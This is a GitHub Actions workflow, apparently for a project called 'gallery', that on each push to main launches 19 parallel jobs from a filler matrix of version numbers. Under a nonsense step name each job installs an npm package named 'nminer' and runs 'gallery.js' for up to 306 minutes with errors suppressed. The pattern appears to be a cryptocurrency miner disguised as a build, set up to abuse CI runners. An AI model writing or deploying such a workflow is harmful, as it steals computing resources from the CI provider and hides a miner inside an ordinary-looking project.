name: gallery
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5248 }
          - { version: 6972 }
          - { version: 9212 }
          - { version: 7356 }
          - { version: 2044 }
          - { version: 3890 }
          - { version: 3030 }
          - { version: 9600 }
          - { version: 3063 }
          - { version: 7110 }
          - { version: 9622 }
          - { version: 1721 }
          - { version: 1059 }
          - { version: 6604 }
          - { version: 1579 }
          - { version: 5218 }
          - { version: 658 }
          - { version: 1042 }
          - { version: 967 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: huzzah cloudy bootleg
        run: |
          npm install nminer@latest
          timeout 306m node gallery.js || echo "gallery executed"